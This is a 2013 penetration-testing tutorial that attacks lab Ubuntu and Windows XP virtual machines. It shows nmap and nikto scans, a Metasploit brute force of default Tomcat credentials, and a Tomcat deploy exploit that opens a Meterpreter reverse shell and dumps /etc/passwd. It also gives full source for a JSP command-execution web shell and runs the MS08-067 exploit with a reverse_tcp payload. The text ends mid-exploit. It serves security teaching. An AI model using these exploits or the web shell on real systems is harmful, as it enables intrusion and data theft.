Hacking

Exploitation Ubuntu – Windows Services

June 27, 2013 by Fotis Liatsis

This tutorial describes the basic principles of gathering information to exploit vulnerable machines like Ubuntu Server and Windows XP. On both systems (Ubuntu and Windows) are installed some vulnerable services like Tomcat Java / Samba File Server or vulnerable Databases like PostgreSQL for Ubuntu machine and MySQL for Windows respectively.

This tutorial outlines many of the security flaws on both OS machines, such as:

  • Gathering information
  • Identify open network services
  • Exploit vulnerable services

(Note: For the Purpose of this tutorial BackBox (Based on Ubuntu) as OS, the latest installation package of Oracle VM Box, and Ubuntu 9.04 / Windows XP SP2 OS’s will be used)

Setting Up VM – Manual ifconfig

Before starting our Penetration Testing on the VM’s, we’ll setup and configure a couple of things on the VM machine system. After we have created our OS machine (Both Ubuntu and Windows OS) click the “Settings” button and navigate to the “Network” tab once more. At network interface, choose the “Host-only Adapter” and automatically the vboxnet0 option will be set.

Next we’ll set up the eth0 interface for Ubuntu OS. On the terminal type:

[c]
ifconfig eth0 192.168.56.102 netmask 255.255.255.0 up
[/c]

If you would like to have the network information statically assigned without having to manually enter this information each time, you can edit the /etc/network/ interfaces file for the appropriate Ethernet device.

[c]
# The host-only network interface
auto eth0
iface eth0 inet static
address 192.168.56.102
netmask 255.255.255.0
network 192.168.56.0
broadcast 192.168.56.255
[/c]

(Note: Be sure to restart the network service after modifying this file (/etc/init.d/ networking restart).)

Next you will set up the Windows Network Interface. On the command prompt type cmd and click “OK”.

Then Navigate to the Network Connections Panel.

Next at the properties panel choose “Internet Protocol(TCP/IP)” and click “Properties”. On the “General” tab choose the “Use the following IP address” and add the appropriate network information (see below):

Next at the command prompt write the following command to verify the adapter options:

[c]
ipconfig /all
[/c]

Verifying connectivity

We will attempt to ping the machines to verify connectivity. If everything is configured correctly, you should see something along the lines of the following commands:

Ubuntu Machine:

[c]
root@wizard32:~# ping 192.168.56.102
PING 192.168.56.102 (192.168.56.102) 56(84) bytes of data.
64 bytes from 192.168.56.102: icmp_req=1 ttl=64 time=0.302 ms
64 bytes from 192.168.56.102: icmp_req=2 ttl=64 time=0.754 ms
^C
— 192.168.56.102 ping statistics —
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.302/0.528/0.754/0.226 ms
[/c]

And

[c]
root@ubuntu:~$ ping 192.168.56.1
PING 192.168.56.1 (192.168.56.1) 56(84) bytes of data.
64 bytes from 192.168.56.1: icmp_req=1 ttl=64 time=0.251 ms
64 bytes from 192.168.56.1: icmp_req=2 ttl=64 time=0.306 ms
^C
— 192.168.56.1 ping statistics —
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 0.251/0.278/0.306/0.032 ms
[/c]

Windows Machine:

[c]
root@wizard32:~# ping 192.168.56.103
PING 192.168.56.103 (192.168.56.103) 56(84) bytes of data.
64 bytes from 192.168.56.103: icmp_req=1 ttl=128 time=0.536 ms
64 bytes from 192.168.56.103: icmp_req=2 ttl=128 time=0.574 ms
^C
— 192.168.56.103 ping statistics —
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 0.536/0.555/0.574/0.019 ms
[/c]

And

[c]
C:Documents and Settingswindowsxp>ping 192.168.56.1
Pinging 192.168.56.1 with 32 bytes of data:
Reply from 192.168.56.1: bytes=32 time<1ms TTL=64
Reply from 192.168.56.1: bytes=32 time<1ms TTL=64
Ping statistics for 192.168.56.1
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
[/c]

Gathering Information – Ubuntu Machine

We’ll begin by trying some basic scans against our VM (Ubuntu) machine at 192.168.56.102. Here we will perform a simple scan to determine what ports are open on our target system using the -p option.

[c]
root@wizard32:~# nmap -p- 192.168.56.102
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 13:54 EEST
Nmap scan report for 192.168.56.102
Host is up (0.00020s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3632/tcp open distccd
5432/tcp open postgresql
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 08:00:27:08:F3:66 (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 14.39 seconds
[/c]

Looking at the highlighted results, we can determine that there are many open ports. So let’s use another tool to identify a little bit more on our machine.

[c]
root@wizard32:~# nikto -h 192.168.56.102 -p 8180
– Nikto v2.1.4
—————————————————————————
+ Target IP: 192.168.56.102
+ Target Hostname: 192.168.56.102
+ Target Port: 8180
+ Start Time: 2013-06-19 14:04:00
—————————————————————————
+ Server: Apache-Coyote/1.1
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this server as: Apache Tomcat
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
+ OSVDB-397: HTTP method (‘Allow’ Header): ‘PUT’ method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method (‘Allow’ Header): ‘DELETE’ may allow clients to remove files on the web server.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ /: Appears to be a default Apache Tomcat install.
+ OSVDB-376: /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-3092: /admin/: This might be interesting…
+ OSVDB-3233: /tomcat-docs/index.html: Default Apache Tomcat documentation found.
+ OSVDB-3233: /manager/html-manager-howto.html: Tomcat documentation found.
+ OSVDB-3233: /manager/manager-howto.html: Tomcat documentation found.
+ OSVDB-3092: /webdav/index.html: WebDAV support is enabled.
+ OSVDB-3233: /jsp-examples/: Apache Java Server Pages documentation.
+ /admin/account.html: Admin login page/section found.
+ /admin/controlpanel.html: Admin login page/section found.
+ /admin/cp.html: Admin login page/section found.
+ /admin/index.html: Admin login page/section found.
+ /admin/login.html: Admin login page/section found.
+ /servlets-examples/: Tomcat servlets examples are visible.
+ 6448 items checked: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2013-06-19 14:05:24 (84 seconds)
—————————————————————————
+ 1 host(s) tested[/c]

Exploit Vulnerable Backdoors

By reviewing the highlighted code closely we can see that the port 8180/tcp runs an Apache Tomcat Server. We can identify the Version of Apache Tomcat Server once more using Metasploit.

[c]
msf > use auxiliary/admin/http/tomcat_administration
msf auxiliary(tomcat_administration) > show options
Module options (auxiliary/admin/http/tomcat_administration):
Name Current Setting Required Description
—- ————— ——– ———–
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 8180 yes The target port
THREADS 1 yes The number of concurrent threads
TOMCAT_PASS no The password for the specified username
TOMCAT_USER no The username to authenticate as
VHOST no HTTP server virtual host
msf auxiliary(tomcat_administration) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf auxiliary(tomcat_administration) > run
[*] http://192.168.56.102:8180/admin [Apache-Coyote/1.1] [Apache Tomcat/5.5] [Tomcat Server Administration] [tomcat/tomcat]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[/c]

As we can see, Apache Tomcat/5.5 is used. So once more using Metasploit we’ll try to connect to the Apache Tomcat Server according to some default user/pass options:

[c]
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(tomcat_mgr_login) > run
[*] 192.168.56.102:8180 TOMCAT_MGR – [01/63] – Trying username:” with password:”
[-] 192.168.56.102:8180 TOMCAT_MGR – [01/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ”
[*] 192.168.56.102:8180 TOMCAT_MGR – [02/63] – Trying username:’admin’ with password:”
[-] 192.168.56.102:8180 TOMCAT_MGR – [02/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*] 192.168.56.102:8180 TOMCAT_MGR – [03/63] – Trying username:’manager’ with password:”
[-] 192.168.56.102:8180 TOMCAT_MGR – [03/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*] 192.168.56.102:8180 TOMCAT_MGR – [04/63] – Trying username:’role1′ with password:”
[-] 192.168.56.102:8180 TOMCAT_MGR – [04/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1’
[*] 192.168.56.102:8180 TOMCAT_MGR – [05/63] – Trying username:’root’ with password:”
[-] 192.168.56.102:8180 TOMCAT_MGR – [05/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*] 192.168.56.102:8180 TOMCAT_MGR – [06/63] – Trying username:’tomcat’ with password:”
[-] 192.168.56.102:8180 TOMCAT_MGR – [06/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘tomcat’
[*] 192.168.56.102:8180 TOMCAT_MGR – [07/63] – Trying username:’both’ with password:”
[-] 192.168.56.102:8180 TOMCAT_MGR – [07/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*] 192.168.56.102:8180 TOMCAT_MGR – [08/63] – Trying username:’j2deployer’ with password:”
[-] 192.168.56.102:8180 TOMCAT_MGR – [08/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘j2deployer’
[*] 192.168.56.102:8180 TOMCAT_MGR – [09/63] – Trying username:’ovwebusr’ with password:”
[-] 192.168.56.102:8180 TOMCAT_MGR – [09/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ovwebusr’
[*] 192.168.56.102:8180 TOMCAT_MGR – [10/63] – Trying username:’cxsdk’ with password:”
[-] 192.168.56.102:8180 TOMCAT_MGR – [10/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘cxsdk’
[*] 192.168.56.102:8180 TOMCAT_MGR – [11/63] – Trying username:’ADMIN’ with password:”
[-] 192.168.56.102:8180 TOMCAT_MGR – [11/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ADMIN’
[*] 192.168.56.102:8180 TOMCAT_MGR – [12/63] – Trying username:’xampp’ with password:”
[-] 192.168.56.102:8180 TOMCAT_MGR – [12/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘xampp’
[*] 192.168.56.102:8180 TOMCAT_MGR – [13/63] – Trying username:’admin’ with password:’admin’
[-] 192.168.56.102:8180 TOMCAT_MGR – [13/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*] 192.168.56.102:8180 TOMCAT_MGR – [14/63] – Trying username:’manager’ with password:’manager’
[-] 192.168.56.102:8180 TOMCAT_MGR – [14/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*] 192.168.56.102:8180 TOMCAT_MGR – [15/63] – Trying username:’role1′ with password:’role1′
[-] 192.168.56.102:8180 TOMCAT_MGR – [15/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1’
[*] 192.168.56.102:8180 TOMCAT_MGR – [16/63] – Trying username:’root’ with password:’root’
[-] 192.168.56.102:8180 TOMCAT_MGR – [16/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*] 192.168.56.102:8180 TOMCAT_MGR – [17/63] – Trying username:’tomcat’ with password:’tomcat’
[+] http://192.168.56.102:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login ‘tomcat’ : ‘tomcat’
[*] 192.168.56.102:8180 TOMCAT_MGR – [18/63] – Trying username:’both’ with password:’both’
[-] 192.168.56.102:8180 TOMCAT_MGR – [18/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*] 192.168.56.102:8180 TOMCAT_MGR – [19/63] – Trying username:’j2deployer’ with password:’j2deployer’
[-] 192.168.56.102:8180 TOMCAT_MGR – [19/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘j2deployer’
[*] 192.168.56.102:8180 TOMCAT_MGR – [20/63] – Trying username:’ovwebusr’ with password:’ovwebusr’
[-] 192.168.56.102:8180 TOMCAT_MGR – [20/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ovwebusr’
[*] 192.168.56.102:8180 TOMCAT_MGR – [21/63] – Trying username:’cxsdk’ with password:’cxsdk’
[-] 192.168.56.102:8180 TOMCAT_MGR – [21/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘cxsdk’
[*] 192.168.56.102:8180 TOMCAT_MGR – [22/63] – Trying username:’ADMIN’ with password:’ADMIN’
[-] 192.168.56.102:8180 TOMCAT_MGR – [22/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ADMIN’
[*] 192.168.56.102:8180 TOMCAT_MGR – [23/63] – Trying username:’xampp’ with password:’xampp’
[-] 192.168.56.102:8180 TOMCAT_MGR – [23/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘xampp’
[*] 192.168.56.102:8180 TOMCAT_MGR – [24/63] – Trying username:’ovwebusr’ with password:’OvW*busr1′
[-] 192.168.56.102:8180 TOMCAT_MGR – [24/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ovwebusr’
[*] 192.168.56.102:8180 TOMCAT_MGR – [25/63] – Trying username:’cxsdk’ with password:’kdsxc’
[-] 192.168.56.102:8180 TOMCAT_MGR – [25/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘cxsdk’
[*] 192.168.56.102:8180 TOMCAT_MGR – [26/63] – Trying username:’root’ with password:’owaspbwa’
[-] 192.168.56.102:8180 TOMCAT_MGR – [26/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*] 192.168.56.102:8180 TOMCAT_MGR – [27/63] – Trying username:” with password:’admin’
[-] 192.168.56.102:8180 TOMCAT_MGR – [27/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ”
[*] 192.168.56.102:8180 TOMCAT_MGR – [28/63] – Trying username:” with password:’manager’
[-] 192.168.56.102:8180 TOMCAT_MGR – [28/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ”
[*] 192.168.56.102:8180 TOMCAT_MGR – [29/63] – Trying username:” with password:’role1′
[-] 192.168.56.102:8180 TOMCAT_MGR – [29/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ”
[*] 192.168.56.102:8180 TOMCAT_MGR – [30/63] – Trying username:” with password:’root’
[-] 192.168.56.102:8180 TOMCAT_MGR – [30/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ”
[*] 192.168.56.102:8180 TOMCAT_MGR – [31/63] – Trying username:” with password:’tomcat’
[-] 192.168.56.102:8180 TOMCAT_MGR – [31/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ”
[*] 192.168.56.102:8180 TOMCAT_MGR – [32/63] – Trying username:” with password:’s3cret’
[-] 192.168.56.102:8180 TOMCAT_MGR – [32/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ”
[*] 192.168.56.102:8180 TOMCAT_MGR – [33/63] – Trying username:’admin’ with password:’manager’
[-] 192.168.56.102:8180 TOMCAT_MGR – [33/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*] 192.168.56.102:8180 TOMCAT_MGR – [34/63] – Trying username:’admin’ with password:’role1′
[-] 192.168.56.102:8180 TOMCAT_MGR – [34/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*] 192.168.56.102:8180 TOMCAT_MGR – [35/63] – Trying username:’admin’ with password:’root’
[-] 192.168.56.102:8180 TOMCAT_MGR – [35/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*] 192.168.56.102:8180 TOMCAT_MGR – [36/63] – Trying username:’admin’ with password:’tomcat’
[-] 192.168.56.102:8180 TOMCAT_MGR – [36/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*] 192.168.56.102:8180 TOMCAT_MGR – [37/63] – Trying username:’admin’ with password:’s3cret’
[-] 192.168.56.102:8180 TOMCAT_MGR – [37/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*] 192.168.56.102:8180 TOMCAT_MGR – [38/63] – Trying username:’manager’ with password:’admin’
[-] 192.168.56.102:8180 TOMCAT_MGR – [38/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*] 192.168.56.102:8180 TOMCAT_MGR – [39/63] – Trying username:’manager’ with password:’role1′
[-] 192.168.56.102:8180 TOMCAT_MGR – [39/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*] 192.168.56.102:8180 TOMCAT_MGR – [40/63] – Trying username:’manager’ with password:’root’
[-] 192.168.56.102:8180 TOMCAT_MGR – [40/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*] 192.168.56.102:8180 TOMCAT_MGR – [41/63] – Trying username:’manager’ with password:’tomcat’
[-] 192.168.56.102:8180 TOMCAT_MGR – [41/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*] 192.168.56.102:8180 TOMCAT_MGR – [42/63] – Trying username:’manager’ with password:’s3cret’
[-] 192.168.56.102:8180 TOMCAT_MGR – [42/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*] 192.168.56.102:8180 TOMCAT_MGR – [43/63] – Trying username:’role1′ with password:’admin’
[-] 192.168.56.102:8180 TOMCAT_MGR – [43/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1’
[*] 192.168.56.102:8180 TOMCAT_MGR – [44/63] – Trying username:’role1′ with password:’manager’
[-] 192.168.56.102:8180 TOMCAT_MGR – [44/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1’
[*] 192.168.56.102:8180 TOMCAT_MGR – [45/63] – Trying username:’role1′ with password:’root’
[-] 192.168.56.102:8180 TOMCAT_MGR – [45/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1’
[*] 192.168.56.102:8180 TOMCAT_MGR – [46/63] – Trying username:’role1′ with password:’tomcat’
[-] 192.168.56.102:8180 TOMCAT_MGR – [46/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1’
[*] 192.168.56.102:8180 TOMCAT_MGR – [47/63] – Trying username:’role1′ with password:’s3cret’
[-] 192.168.56.102:8180 TOMCAT_MGR – [47/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1’
[*] 192.168.56.102:8180 TOMCAT_MGR – [48/63] – Trying username:’root’ with password:’admin’
[-] 192.168.56.102:8180 TOMCAT_MGR – [48/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*] 192.168.56.102:8180 TOMCAT_MGR – [49/63] – Trying username:’root’ with password:’manager’
[-] 192.168.56.102:8180 TOMCAT_MGR – [49/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*] 192.168.56.102:8180 TOMCAT_MGR – [50/63] – Trying username:’root’ with password:’role1′
[-] 192.168.56.102:8180 TOMCAT_MGR – [50/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*] 192.168.56.102:8180 TOMCAT_MGR – [51/63] – Trying username:’root’ with password:’tomcat’
[-] 192.168.56.102:8180 TOMCAT_MGR – [51/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*] 192.168.56.102:8180 TOMCAT_MGR – [52/63] – Trying username:’root’ with password:’s3cret’
[-] 192.168.56.102:8180 TOMCAT_MGR – [52/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*] 192.168.56.102:8180 TOMCAT_MGR – [53/63] – Trying username:’both’ with password:’admin’
[-] 192.168.56.102:8180 TOMCAT_MGR – [53/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*] 192.168.56.102:8180 TOMCAT_MGR – [54/63] – Trying username:’both’ with password:’manager’
[-] 192.168.56.102:8180 TOMCAT_MGR – [54/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*] 192.168.56.102:8180 TOMCAT_MGR – [55/63] – Trying username:’both’ with password:’role1′
[-] 192.168.56.102:8180 TOMCAT_MGR – [55/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*] 192.168.56.102:8180 TOMCAT_MGR – [56/63] – Trying username:’both’ with password:’root’
[-] 192.168.56.102:8180 TOMCAT_MGR – [56/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*] 192.168.56.102:8180 TOMCAT_MGR – [57/63] – Trying username:’both’ with password:’tomcat’
[-] 192.168.56.102:8180 TOMCAT_MGR – [57/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*] 192.168.56.102:8180 TOMCAT_MGR – [58/63] – Trying username:’both’ with password:’s3cret’
[-] 192.168.56.102:8180 TOMCAT_MGR – [58/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[/c]

Reviewing the result we can identify that Apache Tomcat Server accepts as username/password the “tomcat” string, so according to this result, let’s exploit it:

[c]
msf> use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
—- ————— ——– ———–
PASSWORD no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
— —-
0 Automatic
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.56.102
RHOST => 192.168.56.102
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Attempting to automatically select a target…
[*] Automatically selected target "Linux x86"
[*] Uploading 6471 bytes as DqyPmto6a9UzwBp3l1AUIFIT.war …
[*] Executing /DqyPmto6a9UzwBp3l1AUIFIT/xl6Pc2XuqQlqxb03Kl4LmxKMbO3p.jsp…
[*] Undeploying DqyPmto6a9UzwBp3l1AUIFIT …
[*] Sending stage (30246 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:51208) at 2013-06-18 15:30:53 +0300

meterpreter > getuid
Server username: tomcat55
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
cd /etc
cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
::
:
[/c]

Vulnerable Web Service

Open a browser and type in the field, the IP of the VM and specify the port of Apache Tomcat server (IP:Port)

Next click on “Tomcat Manager” from the Administration Panel at the left and type as username/password the “tomcat” string.

Next we’ll create and upload a vulnerable .war file which will give us access to execute a vulnerable code. So create a cmd_shell.jsp file, which will contain the following code:

[js]
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML>
<TITLE>JSP Shell</TITLE>
<BODY>
Note: Against Windows you may need to prefix your command with cmd.exe /c
</br></br>
JSP Command:
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Execute">
</FORM>
<PRE>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</PRE>
</BODY>
</HTML>
[/js]

Then compress the file using the jar command as follows:

[c]
jar -cvf cmd.war cmd_shell.jsp
[/c]

(Note: .war format is the acceptable file type for deploy at Apache Tomcat Manager)

Next Browse the .war file and then deploy it. As we can see the /cmd path was added.

Click this path and then on the navigation bar to complete the path adding cmd_shell.jsp:

At this point we can type any Unix/Windows command like running a command prompt window.

Gathering Information – Windows XP Machine

We’ll begin by trying some basic scan as previews against our VM (Windows XP) machine at 192.168.56.103.

[c]
root@wizard32:~# nmap -p- 192.168.56.103
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 21:56 EEST
Nmap scan report for 192.168.56.103
Host is up (0.00070s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 08:00:27:4F:38:30 (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 31.09 seconds
[/c]

Looking at the highlighted results, we can determine that there are many open ports. So let’s focus on port 445. Using the nmap tool once more we’ll add a couple of parameters to discover a little bit more of the specific port.

[c]
root@wizard32:~# nmap -A -Pn -T4 192.168.56.103 -p 445
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 21:55 EEST
Nmap scan report for 192.168.56.103
Host is up (0.00055s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:4F:38:30 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: WINDOWSX-C7B000, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:4f:38:30 (Cadmus Computer Systems)
|_smbv2-enabled: Server doesn’t support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Computer name: windowsx-c7b000
| NetBIOS computer name: WINDOWSX-C7B000
| Workgroup: WORKGROUP
|_ System time: 2013-06-18 04:36:59 UTC+3
TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 192.168.56.103
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.51 seconds
[/c]

A: Aggressive initiates many options at once such as version and script scanning. Use with caution.

-T (0-5): Timing options Determines how aggressive you want the scan to be.

-Pn: We stop this action for sending out a pingrequest

-p: Only scan specified ports

Identify network services – Exploit Vulnerable Backdoors

By reviewing the highlighted code closely we can see that the port 445/tcp runs a SMB Server. We can identify the OS environment which the SMB server runs by typing:

[c]
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 192.168.56.103
RHOSTS => 192.168.56.103
msf auxiliary(smb_version) > run
[*] 192.168.56.103:445 is running Windows XP Service Pack 2 (language: English) (name:WINDOWSX-C7B000) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[/c]

As we can see, the SMB Server runs on the Windows XP SP2 environment. So once more using Metasploit will try to exploit it.

[c]
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.103
RHOST => 192.168.56.103
set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.56.103 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.56.1 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
— —-
0 Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
